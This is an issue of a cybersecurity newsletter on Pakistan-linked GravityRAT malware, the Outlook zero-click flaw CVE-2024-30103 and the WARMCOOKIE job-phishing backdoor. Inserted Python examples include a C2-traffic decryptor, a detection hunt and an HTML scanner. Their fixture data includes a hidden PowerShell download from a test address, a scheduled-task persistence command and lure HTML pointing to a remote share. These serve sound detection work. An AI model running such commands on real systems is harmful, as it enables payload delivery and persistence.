Android, Windows, Mac users beware

Jun 13 2024



Welcome to Gone Phishing, your daily cybersecurity newsletter that’s reeling in the latest threats hook, line, and sinker! 🎣🎣🎣

Today’s hottest cybersecurity news stories:

  • πŸ₯Β πŸ“± Android, Windows, Mac users beware! Pakistani malware lurks πŸ•Œ

  • πŸ“§ Microsoft Outlook flaw discovered that would allow zero-click attack

  • 🎣 Phishermen are using WARMCOOKIE as bait in backdoor campaign

Welcome to Hackistan 😬😬😬

🚨 Pakistan-linked Malware: Operation Celestial Force ☄️

Threat actors tied to Pakistan have been running a malware campaign called Operation Celestial Force since 2018. The campaign pairs the Android malware GravityRAT with HeavyLift, a Windows malware loader, and both are managed through a panel called GravityAdmin.

🔒 Meet Cosmic Leopard

Cisco Talos tracks this adversary as Cosmic Leopard (aka SpaceCobra) and notes tactical overlap with Transparent Tribe. The malware suite is aimed at users in the Indian subcontinent, and the fact that it is still in use six years on speaks both to its success and to its ongoing evolution.

📱 Multi-platform Threat

GravityRAT, first documented in 2018 as Windows malware, has since gained Android and macOS variants. It has been used to harvest sensitive information from military personnel in India and from the Pakistan Air Force, delivered inside apps posing as cloud storage, entertainment and chat services.

🔗 Coordinated Attacks

Cosmic Leopard relies on spear-phishing and social engineering to lure targets into installing GravityRAT or HeavyLift. GravityAdmin is the panel the operators use to run these attacks, with campaign names such as 'FOXTROT' and 'CRAFTWITHME' marking specific operations.

🖥️ HeavyLift's Role

HeavyLift, the newer addition to the toolkit, reaches Windows systems through malicious installers. Once running it collects system information and polls a command-and-control (C2) server for further payloads; a macOS version behaves the same way.

👥 Targeting Defense and Government

The campaign mainly targets India's defence, government and technology sectors. Researchers stress both how long it has run and how much the tooling has matured over that time.

Stay alert and secure! πŸŒπŸ”’

Instantly calculate the time you can save by automating compliance

Whether you’re starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.

Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.

Instantly calculate how much time you can save with Vanta.

[Calculate now]

Zero-clicks given 💀💀💀

🚨 Zero-Click Vulnerability in Microsoft Outlook! 💻

A serious zero-click remote code execution (RCE) vulnerability, CVE-2024-30103, has been discovered in Microsoft Outlook. The flaw lets an attacker run arbitrary code via a specially crafted email, with no click or other user interaction needed.

📧 Zero-Click Danger

CVE-2024-30103 is alarming because it doesn't require the user to click a link or open an attachment: simply opening the malicious email is enough to compromise the system, which makes it a potent tool for cybercriminals.

πŸ›‘οΈ How It Works

Morphisec's analysis places the flaw in the way Outlook processes certain email components; Microsoft's advisory describes the effect as bypassing Outlook's registry block lists and enabling the creation of malicious DLL files. When the crafted email is opened, the attacker's code runs with the user's privileges, which can lead to full compromise of the workstation, data theft, or onward spread of malware.

🌍 Widespread Impact

With Microsoft Outlook's extensive use in both corporate and personal environments, CVE-2024-30103 poses a significant risk. Successful exploits could result in major data breaches, financial losses, and reputational damage for organisations.

🔧 Mitigation Steps

Microsoft has fixed the issue in its June 2024 security updates, so users and administrators should apply the latest Office updates immediately. Stronger email filtering and monitoring are also recommended to detect and block malicious messages before they reach the inbox.

💬 Expert Advice

"Zero-click vulnerabilities are particularly dangerous due to their lack of user interaction," a Morphisec spokesperson noted. "Organisations must prioritise patching and adopt multi-layered security measures to defend against sophisticated threats."

🚨 Stay Informed and Protected

As of now, no known attacks exploiting CVE-2024-30103 are in the wild. Ensure your systems are updated and secure to mitigate risks from this critical vulnerability.

And that’s the way the WARMCOOKIE crumbles 🍪🍪🍪

🚨 Job Scam Alert: WARMCOOKIE Backdoor 🎣

Researchers at Elastic Security Labs have uncovered a phishing campaign that uses job-themed lures to deliver a Windows backdoor named WARMCOOKIE. The backdoor is used to fingerprint victim machines and stage additional payloads on them.

📧 How It Works

Emails impersonating recruitment firms such as Hays and Michael Page prompt recipients to click a link for job details. After the victim solves a CAPTCHA, a JavaScript file is dropped; when run, it launches PowerShell to download WARMCOOKIE.

πŸ›‘οΈ Capabilities and Tactics

WARMCOOKIE fingerprints infected machines, captures screenshots, and drops further malicious programs. It talks to a hard-coded command-and-control IP address and protects that traffic with a hard-coded RC4 key. Elastic tracks the activity as REF6127.
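As an added illustration (not code from WARMCOOKIE, from Elastic's write-up, or from this newsletter), the snippet below shows what a hard-coded RC4 key buys a defender: anyone holding the key pulled out of a sample can decrypt the implant's traffic, and because RC4 is a stream cipher, two messages encrypted under the same static key with no per-message nonce leak each other's plaintext through a simple XOR. The key bytes, the beacon contents, the beacon format and the 203.0.113.10 address are all constructed for the example.

```python
"""RC4 with a static key: decrypt what you capture, and see why key reuse leaks.

Added example, not code from WARMCOOKIE or from Elastic's analysis. The key,
beacons and framing below are constructed; they are not the real implant's.
"""
from __future__ import annotations


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed stand-ins for values an analyst would pull out of a sample.
EXTRACTED_KEY = b"c0nstructed-k3y"            # assumption: not the real key
C2_ADDRESS = "203.0.113.10"                   # TEST-NET address, not a real C2

# Two constructed fingerprint beacons (the field layout is invented for the demo).
BEACON_1 = b"host=WS01;user=alice;domain=CORP;build=19045"
BEACON_2 = b"host=WS02;user=bob;domain=CORP;build=22631"


def decrypt_beacon(ciphertext_hex: str, key: bytes = EXTRACTED_KEY) -> str:
    """Decrypt a captured beacon with the key recovered from the sample."""
    return rc4(key, bytes.fromhex(ciphertext_hex)).decode("utf-8", errors="replace")


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """With a static key and no nonce, C1 XOR C2 == P1 XOR P2: the keystream cancels.

    Wherever one plaintext is known (fixed field names, a beacon you already
    decrypted), the corresponding bytes of the other message fall out directly.
    """
    return xor_bytes(c1, c2)


if __name__ == "__main__":
    c1 = rc4(EXTRACTED_KEY, BEACON_1)
    c2 = rc4(EXTRACTED_KEY, BEACON_2)
    print("captured :", c1.hex())
    print("decrypted:", decrypt_beacon(c1.hex()))
    # Both beacons start with "host=", so the XOR of the two ciphertexts is all
    # zeros there; XORing the leak with a known beacon recovers the other one.
    leak = keystream_reuse_leak(c1, c2)
    print("leak[:5] is zero:", leak[:5] == b"\x00" * 5)
    print("recovered beacon 2:", xor_bytes(leak, BEACON_1))
```

The `rc4` routine is checked against the standard published test vectors, so it can be dropped into a real traffic decoder once a key has been carved out of a sample; the keystream-reuse function is the reason a static key is an analyst's friend and an implant author's mistake.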

💻 Technical Breakdown

  • The phishing URL, hosted on compromised infrastructure, redirects victims to a landing page.

  • The backdoor establishes persistence using a scheduled task and performs anti-analysis checks to avoid detection.

WARMCOOKIE’s functions include reading and writing files, executing commands via cmd.exe, listing installed applications, and taking screenshots. It shares traits with tooling seen in earlier campaigns across several sectors.
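The delivery chain above (script file, PowerShell download, scheduled task) is exactly the kind of sequence a detection engineer would stitch together from process-creation telemetry. The script below is an added example written for this page, not Elastic's detection content or anything from the campaign itself: it classifies each event against three stages and flags a host only when all three fire in order within a short window. The `ts|host|parent|image|command line` feed format, the host names, paths, task name and the 203.0.113.10 address are constructed for the demo.

```python
"""Hunt for a WARMCOOKIE-style delivery chain in process-creation telemetry.

Added example, not Elastic's detection content or the newsletter's own code.
Event lines are constructed to mimic an EDR/Sysmon process-creation feed
(ts|host|parent|image|command line); hosts, paths and the 203.0.113.10
address are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample: recruiter lure -> .js -> PowerShell download -> scheduled
# task on WS01, plus a benign admin PowerShell run on WS02 for contrast.
SAMPLE_EVENTS = [
    r'2024-06-12T09:01:10Z|WS01|outlook.exe|chrome.exe|chrome.exe https://example.invalid/jobs',
    r'2024-06-12T09:01:44Z|WS01|explorer.exe|wscript.exe|wscript.exe C:\Users\a\Downloads\Job_Details.js',
    r'2024-06-12T09:01:45Z|WS01|wscript.exe|powershell.exe|powershell.exe -w hidden -ep bypass Start-BitsTransfer -Source http://203.0.113.10/update.dll -Destination C:\ProgramData\update.dll',
    r'2024-06-12T09:01:47Z|WS01|powershell.exe|schtasks.exe|schtasks.exe /Create /SC MINUTE /MO 10 /TN RtlUpd /TR "rundll32 C:\ProgramData\update.dll,Start" /F',
    r'2024-06-12T09:05:00Z|WS02|svchost.exe|powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1',
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"(Start-BitsTransfer|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b).*https?://",
    re.I,
)
TASK_CREATE = re.compile(r"/create\b", re.I)
PROXY_EXEC = re.compile(r"\b(rundll32|regsvr32|mshta|wscript|cscript)\b", re.I)

# The three stages, in the order they must occur on one host.
CHAIN = ("script_host_spawns_shell", "shell_download_cradle", "scheduled_task_persistence")


@dataclass
class Event:
    ts: datetime
    host: str
    parent: str
    image: str
    cmd: str


def parse_event(line: str) -> Event:
    ts, host, parent, image, cmd = line.split("|", 4)
    return Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, parent.lower(), image.lower(), cmd)


def classify(ev: Event) -> list[str]:
    """Return the chain stages a single event matches (possibly more than one)."""
    hits = []
    if ev.image in SHELLS and ev.parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_shell")
    if ev.image in SHELLS and DOWNLOAD_CRADLE.search(ev.cmd):
        hits.append("shell_download_cradle")
    if ev.image == "schtasks.exe" and TASK_CREATE.search(ev.cmd) and (
        ev.parent in SHELLS or ev.parent in SCRIPT_HOSTS or PROXY_EXEC.search(ev.cmd)
    ):
        hits.append("scheduled_task_persistence")
    return hits


def find_chains(lines: list[str], window: timedelta = timedelta(minutes=5)) -> dict[str, str]:
    """Map host -> ISO timestamp of the first stage, for hosts where all three
    stages fired in order inside `window`."""
    first_seen: dict[str, dict[str, datetime]] = {}
    for ev in sorted((parse_event(line) for line in lines), key=lambda e: e.ts):
        for stage in classify(ev):
            first_seen.setdefault(ev.host, {}).setdefault(stage, ev.ts)
    chains: dict[str, str] = {}
    for host, stages in first_seen.items():
        if all(s in stages for s in CHAIN):
            times = [stages[s] for s in CHAIN]
            if times == sorted(times) and times[-1] - times[0] <= window:
                chains[host] = times[0].isoformat()
    return chains


if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(classify(parse_event(line)) or "-", "|", line.split("|", 4)[4][:60])
    print("chains:", find_chains(SAMPLE_EVENTS))
```

Each stage on its own is noisy (admins run PowerShell, installers create tasks), which is why the hit is raised on the ordered sequence per host rather than on any single event; the window and the parent/child pairs are the knobs to tune against your own baseline.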

🌍 Global Reach

WARMCOOKIE is being used against targets worldwide, riding on phishing campaigns that borrow the familiar look and feel of job-recruitment emails to lure victims.

📜 Related Campaigns

Trustwave SpiderLabs detailed another campaign that uses invoice-themed decoys and Windows search functionality embedded in HTML to deploy malware. The emails carry a ZIP file containing an HTML document that abuses the Windows "search:" protocol handler: opening it launches a Windows Explorer search whose results present a shortcut (LNK) file, and clicking that shortcut triggers the malicious payload.
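A mail-gateway or sandbox check for this trick can be as simple as parsing HTML attachments for a `search:` URI whose location crumb points off the box. The scanner below is an added example written for this page, not Trustwave's code: it walks link attributes and inline scripts, percent-decodes them, and reports every `search:` URI together with whether its `crumb=location:` names a UNC or WebDAV path. It also looks for the sibling `search-ms:` scheme, on the assumption that both are handled by the same Windows Search protocol handler; the two HTML documents, the 203.0.113.10 host and the query strings are constructed.

```python
"""Flag HTML attachments that hand Windows a search: / search-ms: URI.

Added example, not Trustwave SpiderLabs' code. Both HTML documents are
constructed; the 203.0.113.10 host and query strings are assumptions, and
search-ms: is scanned alongside search: on the assumption that both schemes
reach the Windows Search protocol handler.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes that can carry a navigable URI; inline <script> bodies are scanned too.
URI_ATTRS = {"href", "src", "action", "content", "data", "formaction"}
SEARCH_URI = re.compile(r"""\bsearch(?:-ms)?:[^\s"'<>]+""", re.I)
LOCATION = re.compile(r"location:([^&]+)", re.I)


class _UriCollector(HTMLParser):
    """Gather attribute values and script text where a search: URI could hide."""

    def __init__(self) -> None:
        super().__init__()
        self.candidates: list[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in URI_ATTRS:
                self.candidates.append(value)
        if tag.lower() == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.candidates.append(data)


def find_search_uris(html: str) -> list[dict]:
    """Return every search:/search-ms: URI in the document and whether its
    crumb=location points off-box (UNC or WebDAV path), which is what makes an
    attacker-hosted LNK appear in the victim's Explorer search results."""
    parser = _UriCollector()
    parser.feed(html)
    findings = []
    for text in parser.candidates:
        for uri in SEARCH_URI.findall(unquote(text)):   # decode %5C%5C etc. first
            loc = LOCATION.search(uri)
            target = loc.group(1) if loc else ""
            findings.append({
                "uri": uri,
                "location": target,
                "remote": target.startswith(("\\\\", "//")),
            })
    return findings


def is_suspicious(html: str) -> bool:
    """True when any search URI in the document points at a remote location."""
    return any(f["remote"] for f in find_search_uris(html))


# Constructed lure in the style described above: a ZIP-delivered HTML that
# opens an Explorer search against an attacker host so an LNK shows up.
MALICIOUS_HTML = r'''<html><body>
<p>Your invoice is attached. Click below to view it.</p>
<a href="search-ms:query=invoice&crumb=location:\\203.0.113.10@80\share&displayname=Downloads">Open invoice</a>
<script>
  window.location.href = "search:query=invoice&crumb=location:%5C%5C203.0.113.10%40SSL%5Cshare";
</script>
</body></html>'''

# Constructed benign document for contrast.
BENIGN_HTML = '<html><body><a href="https://example.invalid/invoice.pdf">Invoice</a><p>Search: results</p></body></html>'


if __name__ == "__main__":
    for finding in find_search_uris(MALICIOUS_HTML):
        print(finding)
    print("malicious flagged:", is_suspicious(MALICIOUS_HTML))
    print("benign flagged:", is_suspicious(BENIGN_HTML))
```

Decoding before matching matters: the second lure hides the UNC path behind `%5C%5C`, which a naive substring check for `\\` would miss. On the endpoint side the same idea applies in reverse, namely deciding whether the `search` and `search-ms` handlers need to be reachable from a browser at all.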

🔗 Stay Vigilant

While these attacks need user interaction, they cleverly exploit trust in familiar interfaces. Be cautious with email attachments and links, especially from unknown sources.

Stay alert and protect your systems! πŸŒπŸ”’

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!
